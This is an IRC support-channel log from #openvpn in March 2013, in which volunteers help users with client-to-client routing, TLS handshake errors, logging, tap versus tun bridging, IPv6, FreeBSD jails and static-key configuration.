19:13 <@vpnHelper> "c2c" is "client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. you use this option when you do not want to use selective firewall rules on what clients can access things
19:13 <@vpnHelper> behind other clients
19:13 < JacquesBH> hum... I'm not sure I understand.
19:14 < pekster> Either use that option, or fix your firewalls. You might also have an issue with pushed routes if you are not pushing the route for the VPN range in the 'net30' or 'p2p' topology modes (see the !topology bot output for more info)
19:14 < JacquesBH> !topology
19:14 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this.
19:16 < JacquesBH> pekster: it seems that if I want to ping client from client I need to use the p2p topology, right?
19:16 < JacquesBH> actually I think it's default... I'll check.
19:16 < pekster> net30 is the default topology, unless you specified otherwise
19:16 < pekster> Use of subnet topology is recommended unless you have exotic needs
19:18 < JacquesBH> ok
19:19 < pekster> Ah, I need to correct myself; using net30 or p2p topology will push the subnet only if you use the client-to-client option
19:19 < pekster> So, if you prefer to push the packets to your kernel and let your OS firewall deal with them, you must push the VPN route yourself. Otherwise, use that option and the route will be pushed for you (when you use the --server helper-directive, that is. See that option in the manpage for specifics)
19:21 < JacquesBH> I use openvpn on debian, so it's a simple install... I'm not really familiar with it
19:22 < pekster> If you don't have the need to firewall client to client packets with custom rules, just use the --client-to-client option and it should all magically work
19:23 < pekster> That's effectively what the !c2c output above reads
19:25 < JacquesBH> the --client-to-client is translated with what in the server config file?
19:25 < pekster> "translated" ?
19:25 < pekster> !--
19:25 <@vpnHelper> "--" is OpenVPN allows any option to be placed either on the command line or in a configuration file. Though all command line options are preceded by a double-leading-dash ("--"), this prefix is usually omitted when an option is placed in a configuration file.
19:25 < JacquesBH> hummm
19:26 < pekster> See also the first couple of pages in the openvpn manpage that explain this behaviour
19:26 < JacquesBH> so just "client-to-client" :)
19:26 < pekster> Right. Optionally you may keep the dashes if you'd like
19:26 < JacquesBH> Are the options "topology subnet" and "client-to-client" compatible? I'll try
19:26 < pekster> Yup
19:27 < JacquesBH> It works. <3
19:28 < JacquesBH> mega coooooool
19:29 < JacquesBH> thks pekster :)
19:29 < syn4pse> pekster, restarted from scratch, now all working smoothly and traffic is restricted like i wanted
19:29 < syn4pse> thanks for help ;)
19:29 < JacquesBH> this chan is very helpful.
23:54 < p3rror> hello
23:54 < p3rror> please, why do I have this error :
23:54 < p3rror> TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity)
23:54 < p3rror> TLS Error: TLS handshake failed
23:55 < pekster> Usually a network or firewall problem, or possibly caused if your peer rejects your certificate
23:55 < pekster> Can you check the logs on the other end?
23:58 < p3rror> oups
23:58 < p3rror> I have to activate log on the server
23:58 < p3rror> how to do that
23:59 < p3rror> in the server.conf
23:59 < p3rror> which directive I have to add to append log
23:59 < pekster> !log
23:59 <@vpnHelper> Error: You don't have the owner capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified.
23:59 < pekster> !factoids search log
23:59 <@vpnHelper> 'logs', 'log', 'logfile', 'change-log', 'irclogs', 'topology', 'blog', and 'changelog'
23:59 < pekster> ...
23:59 < pekster> Dumb bot
23:59 < pekster> !factoids whatis log
23:59 <@vpnHelper> "log" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging
--- Day changed Mon Mar 11 2013
00:00 < p3rror> OK
00:00 < pekster> --log-append is like log but appends
00:03 < p3rror> pekster, yes
00:04 < p3rror> pekster, all I have is that http://paste.debian.net/240892/
00:05 < p3rror> and I'm still getting the TLS Error: TLS handshake failed in the client
00:08 < pekster> p3rror: You've let the client attempt to connect and the server has no extra lines in the logfile?
00:08 < p3rror> no
00:08 < p3rror> only that
00:08 -!- NNAEMEKA [~chatzilla@41.206.15.49.vgccl.net] has joined #openvpn
00:09 < pekster> Then it would appear your client isn't successfully reaching your server. Either you have the wrong IP/port in the client config, or something is preventing the traffic from being delivered
00:09 < pekster> Firewalls are a common place to start looking for issues
00:12 < p3rror> pekster, OK
00:14 < NNAEMEKA> help
00:16 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has quit [Read error: Connection reset by peer]
00:21 < NNAEMEKA> !factoids
00:21 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php
00:22 < NNAEMEKA> iman
00:23 < NNAEMEKA> !man
00:23 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
00:24 -!- p3rror [~mezgani@41.248.148.226] has quit [Quit: Leaving]
00:33 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn
00:37 -!- NNAEMEKA [~chatzilla@41.206.15.49.vgccl.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 20.0/20130307075451]]
00:49 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has joined #openvpn
00:50 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has left #openvpn []
01:05 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
01:13 -!- p3rror [~mezgani@41.248.148.226] has joined #openvpn
01:24 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Quit: nonotza]
01:24 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds]
01:29 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
02:15 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
02:25 -!- Shadowized [~Shadowize@84.201.4.120] has joined #openvpn
02:25 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
02:40 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has quit [Ping timeout: 248 seconds]
03:04 -!- thinkHell [~Hell@85.15.47.27] has joined #openvpn
03:11 -!- corretico [~luis@190.211.93.38] has joined #openvpn
03:11 -!- brute11k [~brute@89.249.235.169] has joined #openvpn
03:12 -!- krzee [ba0740c2@openvpn/community/support/krzee] has joined #openvpn
03:12 -!- mode/#openvpn [+o krzee] by ChanServ
03:15 <@krzee> !ping
03:15 <@vpnHelper> pong
03:15 <@krzee> http://pastebin.com/iWcgFaD1 i cant figure out why this client-connect script is failing
03:16 <@krzee> WARNING: Failed running command (--client-connect): external program exited with error status: 1
03:17 <@krzee> pekster: still awake?
03:20 <@krzee> or maybe EugeneKay? =]
03:23 < pekster> krzee: The test doesn't match, so exit returns the implicit '1' error code from that. You should exit your scripts with an explicit success code in such cases, and good practice suggests you do so anyways to avoid such surprises
03:24 <@krzee> meh i see, thanks =]
03:24 -!- jzaw [~jzaw@loki.dzki.co.uk] has joined #openvpn
03:24 < jzaw> morning peeps
03:25 <@krzee> car got stolen last night, and my drunk ass forgot my laptop and a phone in it
03:25 <@krzee> if the phone gets on the internet, this will run and send me the IP
03:25 < jzaw> can one use statements like up ip route add blah blah ... in ovpn?
03:25 < jzaw> and does one then use a down ip route del ?
03:26 <@krzee> !script
03:26 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn
03:26 < jzaw> ta
03:26 <@krzee> you can run any commands in a script
03:26 <@krzee> but theres also --route
03:26 < pekster> Also note jzaw that if you just want control of routes when the VPN comes up and down, the --route command works great, and can be pushed from the server, even in a dynamic sense
03:27 < pekster> The server can push them to clients in ccd files or a --client-connect script if you require per client or dynamic control
03:27 < jzaw> its the route on the server i was wanting to control
03:27 < jzaw> im getting tap0 with ip and routes (and ipv6) on the client
03:28 < jzaw> but of course im remote to the server and cant get into it cos its down the tap0 ... which isnt yet passing my traffic (though logs show lots of exchange and chatter)
03:29 < jzaw> so i cant see exactly whats happening at that end
03:29 < pekster> In a tap setup you do not need to add a route for the VPN network as that is an on-link route
03:30 < jzaw> hmmm but the client gets routes (for itself) down the tap?
03:30 < pekster> It's an IP/mask configuration, just like your Ethernet card
03:31 < pekster> if you do 'ip addr add 10.8.0.1/24' on an adapter, you get the entire /24 route on-link
03:31 < pekster> tun is different; that's a virtual point-to-point link with no on-link routes since it's just the two "points" on the link
03:31 < jzaw> so when i do ip route show on client i can see how the pkts should go
03:32 < jzaw> should i see similar on the server?
03:32 < pekster> My guess is that you messed up the bridge setup if you've lost access with the server. Judging by your reference to the 'ip' command, I assume you're on Linux, where the bridge holds the address, not the bridge members
03:32 < jzaw> ie before the tap comes up ... on the client i dont see routes down the tap
03:32 < jzaw> well this is the problem
03:32 < pekster> What do you mean on the client you "don't see routes down the tap" ?
03:32 < jzaw> im seeing ip's on the br and the tap
03:33 < jzaw> before tap comes up
03:33 < jzaw> 169.254.0.0/16 dev br0 scope link metric 1000
03:33 < jzaw> 192.168.0.0/24 dev br0 proto kernel scope link src 192.168.0.5
03:33 -!- p3rror [~mezgani@41.248.148.226] has quit [Ping timeout: 276 seconds]
03:33 < jzaw> when it comes up
03:33 < jzaw> 81.2.122.192/26 via 81.2.122.209 dev tap0
03:33 < jzaw> 81.2.122.208/29 dev tap0 proto kernel scope link src 81.2.122.210
03:33 <@krzee> pekster: same error, ill paste here cause its only 3 lines
03:33 <@krzee> #!/bin/bash [[ ${common_name} == "jeff-cell" ]] && /bin/env | /bin/mail -s "login from 5150" jeff@doeshosting.com exit
03:33 < jzaw> two new extra ones
03:34 <@krzee> oops webchat flattens it
03:34 <@krzee> ill pastebin after-all
03:34 < jzaw> when the tap gets taken down .... the 81.xxxxx routes go away
03:34 < pekster> krzee: Right. Your test returns '1' (ie: false, no match.) exit has no argument, and thus returns the value of the last exit status (1). This is non-zero, and openvpn treats it as an auth failure
03:35 < pekster> "exit 0" is how you explicitly exit with a 0 status
03:35 < pekster> Same is true of the 'return' builtin in *sh shells
03:35 <@krzee> oh hah
03:35 < pekster> s/exit status/command stat/s
03:35 <@krzee> i thought exit always meant 0
03:35 <@krzee> when no arg
03:35 < pekster> Nope
03:35 <@krzee> thx again =]
03:37 < pekster> jzaw: The tap device is getting assigned an IP then. If it's bridged to something on either end, you should stop trying to push an address to it through openvpn and put it on the bridge yourself, or let the OS's DHCP mechanism do it
03:37 < pekster> I'm not exactly sure what you're trying to accomplish by sending an IP to a tap device bridged to an adapter on your client side anyway. That's not going to do what you want
03:37 <@krzee> pekster++
03:37 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
03:38 < pekster> If you really know what you're doing when you bridge tap0 to br0 on the client end, stop trying to push an address to tap0 from the server. Manage it on the bridge interface
03:40 -!- JackWinter1 [~jack@ppp-256.vo.lu] has joined #openvpn
03:40 < jzaw> at the server im using .... local 81.2.122.221 and server 81.2.122.208 255.255.255.248
03:40 < pekster> --server-bridge? --server is not valid in a tap context
03:40 < jzaw> the tap at the client end comes up with that ip .. not the bridge which seems to keep its 192.168.0.5 addy
03:41 < jzaw> ahhhhh
03:41 < pekster> tap is for Ethernet (OSI Layer2) connectivity, and functions like an Ethernet switch does
03:41 < pekster> tun is what you want unless you actually need to exchange Ethernet frames
03:42 < jzaw> i do want the latter .. ie i want to have my RA on the server end give me ipv6 at client end
03:42 < pekster> Then you don't want a bridge at all on the client
03:43 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Ping timeout: 248 seconds]
03:43 < jzaw> im totally confused then ... every howto seems to use tap + bridge both server and client end
03:44 < pekster> You do not want a bridge at all on the client unless you intend to join the *client* LAN to the server's remote LAN
03:44 < pekster> And that's generally a very bad idea
03:45 < pekster> You really shouldn't do that. If you want to expose remote IPv6 access to a remote LAN like that, set up IPv6 on the remote LAN with your own radvd and route to your remote server via a VPN link
03:45 < jzaw> i do want my client lan devices to route some (most) traffic down the vpn
03:45 <@krzee> so why bridge at all?
03:45 < pekster> Okay, if you want to route traffic, you want a routed (tun) setup
03:45 < pekster> Yea, no bridging needed
03:46 < jzaw> fair enough
03:46 <@krzee> this will be easiest on a router running openvpn on the client sid
03:46 <@krzee> side*
03:47 < jzaw> so tun + routing?
03:47 < pekster> IPv6 is fine, just assign a /64 there if you want to use SLAAC and route it across the link like any other traffic. Give both ends a v4 and v6 address on the VPN, and set up routing as you would normally for a gateway
03:47 <@krzee> then you can redirect on the router, and all lan redirects too
03:47 <@krzee> !sample
03:47 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting
03:47 <@krzee> !redirect
03:47 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
03:47 <@vpnHelper> http://ircpimps.org/redirect.png
03:48 < jzaw> thanks reading now :)
03:48 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 255 seconds]
03:49 -!- newbie [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn
03:49 < jzaw> btw the server end is a routed no nat .. ie has public ipv4 ips .... client end is single public ip and client is behind nat
03:50 -!- newbie is now known as TMcTrain
03:51 < pekster> What are you trying to do? Give every system on the LAN its own public IP, or merely redirect the entire LAN's outbound traffic to the remote system and perform NAT on it to the server's public IP?
03:54 < pekster> I'm not sure about your IPv4 setup, but the proper way to do IPv6 is routing. If you are exposing IPv6 space at the server to the client LAN, you need a delegated block of network space (at least a /64 for SLAAC) that is separate from the network your server is on. This needs to be *routed*, not on-link.
03:55 < pekster> DHCPv6 has a PD feature for this purpose, or you may need to request this from your provider. And that's all somewhat outside the scope of openvpn. Once you have that, you can use a /64 from your delegation on your home LAN and route across the VPN link you establish (the link itself also needs to be a unique network, although you could in theory just use ULA or link-local addresses for the link)
03:56 < pekster> provider being your network provider at the server end
03:57 < pekster> Anyway, I'm up far past my normal sleep time. Best of luck, and there's also #ipv6 if you need direction or reference material on the IPv6 side of things
03:59 <@krzee> gnite
03:59 -!- krzee [ba0740c2@openvpn/community/support/krzee] has quit [Quit: Page closed]
04:14 -!- MaximB [~maxim@bzq-218-139-133.cablep.bezeqint.net] has joined #openvpn
04:15 < MaximB> Hello, I got openvpn setup and working, I am able to connect fine but I need to supply a "Private Key Password" , it works well manually - but is it possible to do it automatically , run openvpn and supply the pass in cli?
04:22 < JacquesBH> !tap32
04:23 < JacquesBH> :p I tried...
04:23 < JacquesBH> So, what is TAP-Win32 on windows ?
04:23 < JacquesBH> Because a friend has this error (I'm on Mac)
04:23 -!- zz_AsadH is now known as AsadH
04:42 -!- thinkHell [~Hell@85.15.47.27] has quit [Ping timeout: 255 seconds]
04:43 -!- thinkHell [~Hell@85.15.47.27] has joined #openvpn
04:46 -!- dxtr [0005ac03@unaffiliated/dxtr] has left #openvpn []
05:01 -!- brute11k1 [~brute@89.249.235.169] has joined #openvpn
05:02 -!- dazo_afk is now known as dazo
05:03 -!- brute11k [~brute@89.249.235.169] has quit [Ping timeout: 264 seconds]
05:06 -!- mustu [~maan@unaffiliated/mustu] has joined #openvpn
05:07 < mustu> hi, I need to connect a VPN over my OpenVPN connection.. any clue?
05:12 -!- MaximB [~maxim@bzq-218-139-133.cablep.bezeqint.net] has left #openvpn []
05:44 -!- brute11k1 [~brute@89.249.235.169] has quit [Ping timeout: 250 seconds]
05:45 -!- brute11k [~brute@89.249.235.169] has joined #openvpn
05:46 -!- erry [erry@happy/birthday/erry] has quit [Changing host]
05:46 -!- erry [erry@freenode/staff/erry] has joined #openvpn
06:00 -!- thinkHell [~Hell@85.15.47.27] has quit [Quit: ["pop()"]]
06:06 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn
06:14 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Read error: Connection reset by peer]
06:15 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
06:22 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds]
06:22 -!- _b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
06:22 -!- _b00b is now known as b00b
06:47 -!- oskie [~usel@h-254-83.a218.priv.bahnhof.se] has left #openvpn []
06:58 -!- fluter [~fluter@fedora/fluter] has joined #openvpn
07:11 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn
07:24 -!- JSharpe [~JSharpe@46.165.221.13] has joined #openvpn
07:47 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 260 seconds]
07:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
07:53 -!- no0 [~ns@2001:878:200:1053:30a9:3c95:6513:3468] has joined #openvpn
08:06 -!- corretico [~luis@190.211.93.38] has quit [Remote host closed the connection]
08:09 < rob0> erry, happy birthday :)
08:12 < erry> thanks ;p
08:12 -!- datruth [~datruth@unaffiliated/datruth] has joined #openvpn
08:12 < datruth> I'm running FreeBSD 8.3 is it possible to run openvpn server inside of a jail?
08:12 -!- no0 [~ns@2001:878:200:1053:30a9:3c95:6513:3468] has quit [Quit: no0]
08:15 < Aprogas> I never tried, but since OpenVPN goes "inside" of UDP, I would guess it is.
08:15 <@ecrist> datruth: yes, it is
08:17 < datruth> hrmm
08:17 * datruth continues to google
08:17 <@ecrist> what problem are you having?
08:18 < datruth> ecrist: i've configured the jail+devfs.rules to allow the jail to see the tun device when I try to start it it says it's unable to allocate tun/tap device dynamically
08:19 <@ecrist> as root, in the jail, are you able to assign/configure the tun device?
08:20 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 276 seconds]
08:20 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
08:21 < datruth> hrmm ecrist since I am in a jail I dont believe that is allowed
08:21 <@ecrist> that's the biggest issue
08:22 <@ecrist> I think, when we ran inside a jail, we were using bridged mode
08:22 < datruth> hrmm
08:25 < datruth> perhaps it might be easier to just run it on the host :(
08:26 < rob0> you can probably preallocate the tun before entering the jail
08:27 < datruth> rob0: thats what I am doing I thought
08:27 < datruth> I can set an ip to it etc
08:27 < datruth> during the boot of the jail that is
08:27 <@ecrist> rob0: you can't assign an IP to a device from within the jail
08:28 <@ecrist> at least, that's the way it was when I last used jails
08:28 -!- mattock_afk is now known as mattock
08:30 < datruth> yeah you can't assign an ip from inside the jail
08:36 < datruth> ecrist: is there a reason to put openvpn inside of jail does it make it more secure?
08:38 <@ecrist> no, it doesn't
08:38 <@dazo> what's the purpose of jails then?
08:39 <@ecrist> overgrown chroot
08:39 < datruth> I don't see any way how a user could hack into the system via openvpn
08:39 < datruth> so putting it in a jail might be overkill?
08:39 <@dazo> datruth: buffer overflow leading to a potential remote execution of binary code ...?
08:40 < datruth> I guess that is possible :(
08:41 <@dazo> within a jail ... it should be harder to do that, to get access to "tools" like a shell, wget/curl, etc ... to download even more to make your box a botnet member or whatever they'd like to do with your box
08:42 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn
08:43 < vaillor> hi guys, i'm having troubles configuring a static key tunnel with my iphone
08:43 < vaillor> i imported the client config that i use on my linux client and the static.key
08:43 < vaillor> they are imported well
08:43 < vaillor> but openvpn connect doesn't let me connect
08:44 < datruth> dazo: ahh gotcha i'll continue to google and try and figure out why the vpn wont start and how to resolve it
08:45 <@ecrist> dazo: a jail isn't really going to prevent that attack vector. a jail runs on the base system's kernel, and the jail ID is attached to the process. a buffer overflow will likely work around that. jails have the full system's resources, as well, regarding system tools and utilities, though that is/can be separate from the base system
08:46 <@ecrist> datruth: if you're using routed VPN, it won't start because it can't assign the IP to the tun interface
08:47 < datruth> ecrist: i'm setting the ip during boot time
08:47 <@ecrist> what does your openvpn log show, and what does the config look like?
08:48 < vaillor> so? any help?
08:48 < datruth> I'll get a pastebin going
08:48 <@dazo> hmmm ... I see ... then the BSD jails are pretty different from Linux containers ... even though, they're not a security feature by itself ... but you get separate PID namespaces, network namespaces and they're working on uid/gid namespaces too, ... so it's a weird mixture of virtualisation without actually using virtualisation
08:49 <@ecrist> right
08:51 <@ecrist> vaillor: your key needs to be inline, not a separate file. also, need to see logs to help
08:52 < datruth> ecrist: http://paste.ee/p/LWjHv
08:52 * EugeneKay stomach rumbles
08:52 <@ecrist> datruth: try starting it outside the jail
08:52 < datruth> ecrist: openvpn on the host works fine
08:53 < vaillor> ecrist, the key is accepted
08:53 <@ecrist> vaillor: logs
08:53 < vaillor> no errors
08:53 < vaillor> i simply can't connect
08:53 <@EugeneKay> No errors does not mean nothing interesting
08:53 <@ecrist> vaillor: great, if there are no errors in the log, everything is working well
08:53 <@EugeneKay> Please produce the logs or stop expecting us to care
08:53 < vaillor> no, simply nothing happens
08:54 < vaillor> i can't enable
08:54 < vaillor> i can make a screenshot
08:54 < vaillor> is the only thing i can do
08:54 <@ecrist> datruth: it's gotta be a jail thing with restrictions on network interfaces
08:56 < datruth> hrmm
08:56 < vaillor> https://dl.dropbox.com/u/23394250/Foto%2011-03-13%2014%2055%2037.png
08:56 < vaillor> this is it
08:57 < JacquesBH> Hi guys, I've 4 clients, 1 mac, 1 win8, 2 win7, the mac and the win8 are visible with the IP of the server. But both win7 are visible with the IP of the Internet connection... maybe there is an option somewhere?
08:57 <@ecrist> do they have --no-pull in their client configs?
08:57 <@ecrist> or, are you pushing redirect gateway to them properly?
08:57 < JacquesBH> Hum I think no, I check
08:58 < JacquesBH> I'm pushing like that : push "redirect-gateway def1"
08:58 < JacquesBH> They use OpenVpn portable.
08:59 <@ecrist> are the client instances being run as root/admin?
08:59 < vaillor> ecrist, have you seen the screenshot?
08:59 <@ecrist> screen shot helps not at all
08:59 < vaillor> is what i get into openvpn CONNECT
08:59 < vaillor> logs screen is empty
08:59 < vaillor> :\
09:00 <@ecrist> I've never used the openvpn client in iphone
09:00 <@ecrist> I can't help you
09:00 < vaillor> :\
09:01 < JacquesBH> ecrist: maybe the admin launch
09:02 <@ecrist> without admin, the client will run, and it'll get an IP, but the routes can't be added
09:02 < vaillor> ecrist, do you know someone who can help me in this chan?
09:02 <@ecrist> describes exactly what your problem is
09:02 <@ecrist> no
09:02 < datruth> hrmm
09:02 < datruth> not really sure what I can do to fix this
09:02 <@ecrist> run it on the host...
09:03 < datruth> that's my last resort
09:03 < datruth> ;/
09:04 <@ecrist> datruth: I've never had a security issue with openvpn on freebsd, and we run ours publicly, and have done so since at least 2006
09:04 <@ecrist> you can drop privileges upon start
09:04 <@ecrist> also, not sure how well routing is going to work with openvpn in a jail
09:04 < JacquesBH> ecrist: thanks :) it was that.
09:04 <@ecrist> JacquesBH: no problem
09:05 < vaillor> <@ecrist> vaillor: your key needs to be inline, not a separate file.
09:05 < vaillor> why you said this?
09:05 < vaillor> if you never used that app?
09:05 < datruth> ecrist: user/group is what drops the privs?
09:06 <@ecrist> datruth: yes
09:06 < datruth> gotcha
09:06 <@ecrist> keep in mind, datruth, if you do that, you can't change the routing table afterwards
09:06 < mustu> hi all
09:07 < datruth> ecrist: in that case I should use route in the config to set all the routing tables I will need otherwise make changes to the .conf and reboot?
09:07 <@ecrist> yup
09:07 < mustu> Can I connect to an OpenVPN and from there connect another VPN(Juniper) ?
09:07 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
09:07 <@ecrist> don't know that you need to reboot, though.
09:07 <@ecrist> mustu: no
09:07 <@ecrist> openvpn is its own protocol
09:07 < datruth> ecrist: reboot openvpn that is
09:08 <@ecrist> then yes
09:08 < datruth> ecrist: my configuration looking good?
09:08 < datruth> from the paste.se
09:08 < mustu> ecrist: our client doesn't want us to connect from home. So we need to connect to our office then their office.. any clue ?
09:09 <@ecrist> datruth: nothing jumps out at me as wrong.
09:09 < datruth> thanks for the tips and your review
09:09 <@ecrist> mustu: use openvpn between home and your office, and have a juniper vpn connection between your office and your client's office
09:10 < mustu> ecrist: we don't have dedicated VMs/PC in office. Can I dial the next VPN from my PC after connecting first VPN?
09:11 <@ecrist> if you have nowhere to connect to, what's the point of the first vpn?
09:11 < mustu> client allows VPN connection from our Office IPs only. We need to work from home also.
09:12 < datruth> ecrist: I have 2 machines on 2 different networks and different internal IP subnets what would be the best way to be able to connect to both networks?
09:14 < datruth> ecrist: would that still be using the route command in the config?
09:14 <@ecrist> and an iroute for one of the clients
09:15 <@ecrist> so, put the VPN server on one network, push route for that network and the other to all your clients
09:15 <@ecrist> setup CCD for another client, put that client on the second network, and have an iroute in the CCD file for the second network.
09:21 < datruth> ok that'll work
09:21 < datruth> so I will only need to run 1 vpn server
09:21 < datruth> ?
09:22 <@ecrist> correct
09:22 < datruth> ok great
09:24 < datruth> ecrist: even with the vpn running on the host and dropping the root privs could I still be attacked with the buffer overflow or anything else?
09:24 <@ecrist> yes
09:29 -!- fluter [~fluter@fedora/fluter] has quit [Quit: Leaving]
09:30 -!- Netsplit *.net <-> *.split quits: Azrael_-, uberushaximus, MacGyver, nutcase, AsadH, Aprogas, TypoNe, Aketzu, pekster, JackSparrow, (+1 more, use /NETSPLIT to show all of them)
09:31 -!- MacGyver [~MacGyver@kershaw.polvanaubel.com] has joined #openvpn
09:31 -!- MacGyver [~MacGyver@kershaw.polvanaubel.com] has quit [Changing host]
09:31 -!- MacGyver [~MacGyver@unaffiliated/macgyvernl] has joined #openvpn
09:31 -!- Netsplit over, joins: ngharo, Aprogas, Aketzu, uberushaximus, Azrael_-, pekster
09:32 -!- Netsplit over, joins: JackSparrow
09:32 -!- Netsplit over, joins: TypoNe, nutcase
09:36 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn
09:55 < vaillor> ecrist
09:55 < vaillor> http://pastebin.com/dyy4t2ai
09:55 < vaillor> this is the log
09:57 < vaillor> http://pastebin.com/QmpFWM6b
09:57 < vaillor> this is my config
09:57 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has quit []
09:58 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has joined #openvpn
10:28 < syn4pse> "The certificate format is invalid"
10:28 < vaillor> i know
10:28 < vaillor> but the certificate should be a static key
10:32 -!- bjh4 [~bjh4@12.239.198.1] has joined #openvpn
10:33 -!- AsadH is now known as zz_AsadH
10:34 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal]
10:48 <@ecrist> vaillor: I thought there were no errors in the log...
10:50 -!- rfxn [~teck7@69.157.149.169] has joined #openvpn
10:50 < vaillor> ecrist, i'm trying to know if openvpn connect client supports static key
10:52 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood]
10:54 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 240 seconds]
10:58 -!- datruth [~datruth@unaffiliated/datruth] has quit [Ping timeout: 250 seconds]
11:05 -!- [fred] [fred@konfuzi.us] has joined #openvpn
11:06 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn
11:10 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
11:18 -!- mikkel [~mikkel@80.71.132.15] has joined #openvpn
11:23 -!- datruth [~datruth@110.216.117.66.DED-DSL.fuse.net] has joined #openvpn
11:24 <@ecrist> vaillor: I don't know if it does or not
11:26 < pekster> vaillor: Your 2nd paste, the blob starting at line 26 is not an X509 certificate. It looks like a 2048 bit OpenVPN static key...
11:27 < pekster> You cannot feed PolarSSL/OpenSSL a static key and treat it as an X509 certificate. Hence your error on line 2
11:28 -!- datruth [~datruth@110.216.117.66.DED-DSL.fuse.net] has quit [Ping timeout: 248 seconds]
11:28 < pekster> This is completely incorrect: < vaillor> but the certificate should be a static key
11:29 < pekster> If you're using static key, you want the section
11:29 < pekster> When using the cert or key directive (or XML section) you need to be using X.509 keypairs
11:29 < vaillor> yes but i use static key, and not ssl
11:29 < pekster> I believe I just explained what you need
11:29 < vaillor> ok, so
11:29 < vaillor> i remove all the keys
11:29 <@EugeneKay> I believe I want bacon
11:29 < vaillor> and just add
11:30 < vaillor>
11:30 < pekster> Right
11:30 < vaillor> but static key is not in x509 format
11:30 < vaillor> right?
11:31 < pekster> Static keys look like that text, although you have ASCII chars in there; AFAIK an openvpn static key is hex characters only
11:31 < pekster> Lines 12, 32, & 53
11:32 < vaillor> pekster, i modified it
11:32 < pekster> Note also that the --tls-auth option is only used in TLS (ie: X509) mode
11:32 < vaillor> to hide my key
11:32 < vaillor> :P
11:33 < pekster> That's a bad way to do that because not all the bits of the key file are used, and parts of them are used asymmetrically depending on setup
11:34 < pekster> If that's a keypair you intend to use for live use, you should consider them compromised and replace them before any production use (ie: use outside of a lab for testing)
11:34 < vaillor> http://pastebin.com/sMc7t8MJ
11:34 < vaillor> now should be good?
11:35 < pekster> No, lines 6/25 need to be
11:35 < vaillor> ok, done
11:35 < pekster> Do not use unless you are actually defining an X509 certificate as explained by --cert in the manpage
11:35 < pekster> But yes
11:35 < pekster> Then it's good
11:35 < pekster> Oh, hold on
11:35 < vaillor> now, lets try
11:35 < vaillor> what?
11:35 < pekster> Probably needs to start with the armor:
11:36 < pekster> -----BEGIN OpenVPN Static key V1----- [...] -----END OpenVPN Static key V1-----
11:36 < vaillor> ok
